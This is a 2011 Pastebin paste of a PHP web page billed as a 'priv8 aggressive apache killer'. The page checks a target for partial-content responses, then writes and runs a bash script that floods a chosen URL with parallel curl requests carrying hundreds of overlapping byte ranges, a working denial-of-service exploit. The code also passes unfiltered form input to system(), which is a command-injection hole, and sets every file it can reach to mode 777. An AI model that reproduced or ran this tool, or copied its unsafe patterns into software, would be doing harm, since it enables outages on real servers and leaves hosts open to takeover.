Guest User

[4L4N4 K!LL3R by S4(uR4] top priv8 agressive apache killer e

a guest
Oct 1st, 2011
6,506
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4.  
  5.     Devoted my ex-girlfriend Kh. Alana[from Kagan city] (;
  6.     k!ll m3 --- s4f3 the fuck'!n w0rldzzzzz
  7.     S4(uR4, r00tw0rm __2011__
  8.     w4tch u. h4ck u. fuck u.
  9.     Pr!v8 2 Publ!c
  10. */
  11.  
  12. error_reporting(0);
  13. `chmod -R 777 *`;
  14.  
  15. ?>
  16.  
  17. <html><head><title>~=4L4N4 K!LL3R by S4(uR4=~</title>
  18. <meta charset='utf-8'>
  19. </head><body bgcolor = "black">
  20. <font color='#969696'>
  21. <pre>
  22. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  23. 0             __      __   __                   __                           1
  24. 1           /'__`\  /'__`\/\ \__              /'__`\                         0
  25. 0     _ __ /\ \/\ \/\ \/\ \ \ ,_\  __  __  __/\ \/\ \  _ __    ___ ___       1
  26. 1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\     0
  27. 0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \    1
  28. 1     \ \_\  \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\   0
  29. 0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
  30. 1                                                                            0
  31. 0                                                                            1
  32. 1              <font color="red">                         >> 4L4N4 K!LL3R</font>                      0
  33. 0                                       >> author : S4(uR4                   1
  34. 1                                       >> sanjar[at]xakep[dot]ru            0
  35. 0                                       >> Priv8 v.0.1                       1
  36. 1                                       >> )c(  2011                         0
  37. 0                                                                            1
  38. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
  39. </pre></font>
  40.  
  41. <h3><font color='555555'>[CHECK] (Vulned : "HTTP/1.1 206 Partial Content") ::</font></h3>
  42. <form action="index.php" method="POST">
  43. <font color="hack">TESTED URL : </font><input type="text" name="test_url"><br>
  44. <input type=submit value="Ch3ck 1t!">
  45. </form>
  46. <font color='red'>
  47. <?php
  48.  
  49. echo "<br></pre>";
  50.        //if(!empty($_POST[0])){
  51.        echo "<br><font color='hack'>"."[+] Server Test Running : <pre>";
  52.        echo "<br>";
  53.        system('curl -I -H "Range : bytes=0-1,0-2" -s '.$_POST["test_url"]);
  54.        echo "</pre>";
  55.  
  56. ?>
  57.  
  58. <h3><font color='555555'>[ATACK] ::</font></h3>
  59. <form action="index.php" method="POST">
  60. <font color='hack'>REQUEST : </font> <input type=text name="request"><br>
  61. <font color='hack'>THREADS : </font> <input type="text" name="threads"><br>
  62. <font color="hack">URL     : </font><input type="text" name="url"><br>
  63. <input type=submit value="Fuck UP!">
  64. </form>
  65.  
  66. <h3><font color='555555'>[LOG] ::</font></h3>
  67.  
  68. <?php
  69.  
  70. echo "<font color='555555'>PWD :: ".`pwd`;
  71. echo "<br>SYSTEM :: ".`uname -a`;
  72. echo "<br>ID :: ".`id`;
  73. echo "<br>DATE :: ".`date`."</font><br>";
  74.  
  75.  
  76. $tmp1 = "alana_kill3r.sh";
  77. `touch alana_kill3r.sh`;
  78. $apache_killer = <<<XPLOIT
  79. #!/bin/bash
  80. test "$1" == "" && echo $0 requests threads target-url && exit 0
  81. seq 1 $1 | xargs -I{} -P $2 curl -I -H "User-Agent:" \
  82. -H "Range: bytes=0-`printf ',5-%d' {10..1000}`" \
  83. --compress -s $3 | grep HTTP
  84. XPLOIT;
  85.  
  86. if (is_writable($tmp1)) {
  87.     if (!$handle = fopen($tmp1, 'w+')) {
  88.          echo "<font color='red'>[x] Can't open file ($tmp1)</font>";
  89.          exit;
  90.     }
  91.     if (fwrite($handle, $apache_killer) === FALSE) {
  92.         echo "<font color='red'>[x] Can't write file ($tmp1)</font>";
  93.         exit;
  94.     }
  95.     echo "<br><font color='hack'>"."[+] ALL OK, xpl0it Writed</font>";
  96.     fclose($handle);
  97. } else {
  98.     echo "<br><font color='red'>[x] File $tmp1 has not access to write</font>";
  99. }
  100.  
  101. ?>
  102.  
  103.  
  104.  
  105.  
  106. <?php
  107. echo"<br><pre>";
  108. $pwd = "-al";
  109. system("ls ".$pwd);
  110. echo "<br></pre>";
  111.        echo "<br><font color='hack'>"."[+] Xploit Started with : <pre>";
  112.        `chmod +x`.$tmp1;
  113.        echo "<br>root@r00tw0rm:$ ";
  114.        system("bash ./".$tmp1." ".$_POST["request"]." ".$_POST["threads"]." ".$_POST["url"]);
  115.        echo "</pre>";
  116. ?>
  117.  
  118.  
  119. </font>
  120. </body></html>
  121.  
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×